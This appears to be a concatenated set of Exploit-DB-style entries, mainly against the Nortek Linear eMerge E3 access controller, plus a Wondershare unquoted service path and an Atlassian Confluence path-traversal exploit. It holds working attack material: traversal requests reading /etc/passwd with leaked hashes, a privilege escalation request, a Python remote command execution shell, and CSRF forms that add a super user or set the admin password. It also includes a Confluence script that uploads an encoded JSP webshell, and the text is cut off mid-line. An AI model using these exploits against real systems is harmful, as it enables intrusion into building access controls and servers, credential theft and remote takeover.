# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7254 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 2.4.3.231 # Tested on: Windows 10 Home Single Language # CVE : N/A # Explot-Wondershare WsAppService.txt #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto C:\Users\user>sc query WsAppService NOMBRE_SERVICIO: WsAppService TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0

# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7254, CVE-2019-7259 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC # Escalate: curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1 Disclose: curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1

# Exploit Title: eMerge E3 1.00-06 - Remote Code Execution # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7256 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 #!/usr/bin/env python # ################################################################### # lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2 # # [email protected]:/spider/web/webroot$ id # uid=1003(lighttpd) gid=0(root) # # [email protected]:/spider/web/webroot$ echo davestyle |su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # [email protected]:/spider/web/webroot$ exit # # [+] Erasing read stage file and exiting... # [+] Done. Ba-bye! # ################################################################### import requests import sys,os## piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n' sys.exit() ipaddr = sys.argv[1] print while True: try: cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ') execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60') readreq = requests.get('http://'+ipaddr+'/test.txt') print readreq.text if cmd.strip() == 'exit': print "[+] Erasing read stage file and exiting..." requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60') print "[+] Done. Ba-bye!\n" break else: continue except Exception: break sys.exit()

# Exploit Title: eMerge E3 1.00-06 - Cross-Site Request Forgery # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7262 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC # Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery <!-- CSRF Add Super User --> <html> <body> <form action="http://192.168.1.2/?c=webuser&m=insert" method="POST"> <input type="hidden" name="No" value="" /> <input type="hidden" name="ID" value="hax0r" /> <input type="hidden" name="Password" value="hax1n" /> <input type="hidden" name="Name" value="CSRF" /> <input type="hidden" name="UserRole" value="1" /> <input type="hidden" name="Language" value="en" /> <input type="hidden" name="DefaultPage" value="sitemap" /> <input type="hidden" name="DefaultFloorNo" value="1" /> <input type="hidden" name="DefaultFloorState" value="1" /> <input type="hidden" name="AutoDisconnectTime" value="24" /> <input type="submit" value="Add Super User" /> </form> </body> </html> <!-- CSRF Change Admin Password --> <html> <body> <form action="http://192.168.1.2/?c=webuser&m=update" method="POST"> <input type="hidden" name="No" value="1" /> <input type="hidden" name="ID" value="admin" /> <input type="hidden" name="Password" value="backdoor" /> <input type="hidden" name="Name" value="admin" /> <input type="hidden" name="UserRole" value="1" /> <input type="hidden" name="Language" value="en" /> <input type="hidden" name="DefaultPage" value="sitemap" /> <input type="hidden" name="DefaultFloorNo" value="1" /> <input type="hidden" name="DefaultFloorState" value="1" /> <input type="hidden" name="AutoDisconnectTime" value="24" /> <input type="submit" value="Change Admin Password" /> </form> </body> </html>

# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: max7253 # Vendor Homepage: https://www.atlassian.com # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: 6.15.1 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu # CVE : 2019-3398 #Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398) #To use this exploit you should specify the following variables: #OS - Linux or Windows. #PROTO - http or https. #USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server. #HOSTNAME - the domain name or IP address of the server and its port. #ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'. #Typical ROOTFOLDER locations are: #Windows: Program Files/Atlassian/Confluence/confluence/pages/ #Linux: opt/atlassian/confluence/confluence/pages/ #Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above). #PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files. #For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true. #If PAGEID is set to 0, the script will try to create a new Page ID in one of the available spaces. If it fails, it will try to create a new space and create a Page ID there. #If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range and try to upload shellcode till it succeeds. #The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the webshell, then imitates the 'Download all' action to place the webshell to the root directory of the web server. #Tested on Atlassian v6.15.1. on Linux and Windows. #Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5. import requests import urllib3 import base64 from bs4 import BeautifulSoup import numpy as np import re import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) OS = 'Windows' #change this parameter PROTO = 'http' #change this parameter USERNAME = 'test' #change this parameter PASSWORD = 'test' #change this parameter HOSTNAME = '192.168.198.144:8090' #change this parameter ROOTFOLDER = 'Program Files/Atlassian/Confluence/confluence/pages/' #change this parameter (Windows) #ROOTFOLDER = 'opt/atlassian/confluence/confluence/pages/' #change this parameter (Linux) PAGEID = '0'#'1245201' #change this parameter PAGEID_RANGE_START = np.int64(1) #change this parameter PAGEID_RANGE_END = np.int64(999999999999) #change this parameter ATLTOKEN = '' LOGINURL = '%s://%s/dologin.action' % (PROTO, HOSTNAME) UPLOADURL = '%s://%s/plugins/drag-and-drop/upload.action' % (PROTO, HOSTNAME) DOWNLOADALLURL = '%s://%s/pages/downloadallattachments.action' % (PROTO, HOSTNAME) CREATEPAGEURL = '%s://%s/pages/createpage.action?spaceKey=' % (PROTO, HOSTNAME) VIEWSPACESURL= '%s://%s/rest/api/space' % (PROTO, HOSTNAME) WEBSHELLURL = '%s://%s/pages/assist.jsp' % (PROTO, HOSTNAME) SHELLCODE_WINDOWS = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \ 48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \ VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \ I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \ dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \ BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \ MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \ VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \ NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \ AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \ dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \ VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \ MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \ AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMDlcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlc \ dTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \ FcdTAwNkVcdTAwNjRcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAw \ NTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdT \ AwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNjVcdTAwMjJcdTAwMkNc \ dTAwMjBcdTAwMjJcdTAwMkZcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNz \ FcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAw \ NjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdT \ AwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNj \ NcdTAwNjVcdTAwNzNcdTAwNzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAw \ NzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdT \ AwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVc \ dTAwNjVcdTAwNzhcdTAwNjVcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \ FcdTAwNkVcdTAwNjRcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdT \ AwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBc \ dTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNz \ RcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAw \ MjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \ AwMjBcdTAwMjBcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \ dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \ BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAw \ NTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdT \ AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFc \ dTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNz \ JcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAw \ MjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdT \ AwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRc \ dTAwMjhcdTAwNjlcdTAwNkVcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAw \ NjdcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVc \ dTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAw \ MjhcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAw \ NzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdT \ AwNzNcdTAwNzJcdTAwMjlcdTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBc \ dTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNj \ RcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAw \ MEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT \ 4KPC9wcmU+CjwvQk9EWT48L0hUTUw+' SHELLCODE_LINUX ='PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \ 48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \ VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \ I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \ dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \ BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \ MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \ VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \ NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \ AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \ dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \ VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \ MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \ AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNU \ JcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \ MjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdT \ AwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdTAwMjJcdTAwMkZcdTAwNjJc \ dTAwNjlcdTAwNkVcdTAwMkZcdTAwNzNcdTAwNjhcdTAwMjJcdTAwMkNcdTAwMjBcdTAwMjJcdTAwMk \ RcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAw \ NzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdT \ AwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRc \ dTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNjNcdTAwNjVcdTAwNzNcdTAw \ NzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdT \ AwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTJcdTAwNzVcdTAwNkVc \ dTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNj \ VcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \ MjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \ AwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \ dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \ BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAw \ NzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdT \ AwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDlc \ dTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNk \ RcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAw \ NjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdT \ AwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwND \ lcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAw \ NkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdT \ AwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVc \ dTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwNjlcdTAwNk \ VcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVc \ dTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMj \ lcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAwMjhcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNzVcdTAwNkNc \ dTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAwNzBcdTAwNzJcdTAwNjlcdT \ AwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjlc \ dTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNj \ RcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAw \ NkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAwMEFcdTAwMjBcdTAwMjBcdT \ AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT4KPC9wcmU+CjwvQk9EWT48 \ L0hUTUw+' session = requests.session() #proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' #} def do_authenticate(): global ATLTOKEN auth_form_data = { 'os_username': USERNAME, 'os_password': PASSWORD, 'login': 'Log+in', 'os_destination': '' } r = session.post(LOGINURL, data=auth_form_data, allow_redirects=True, verify=False)#, proxies=proxies) if r.text.find('re-enter your login') != -1: print 'Authentication failed' return 0 elif r.text.find('Sorry, your username and/or password are incorrect') != 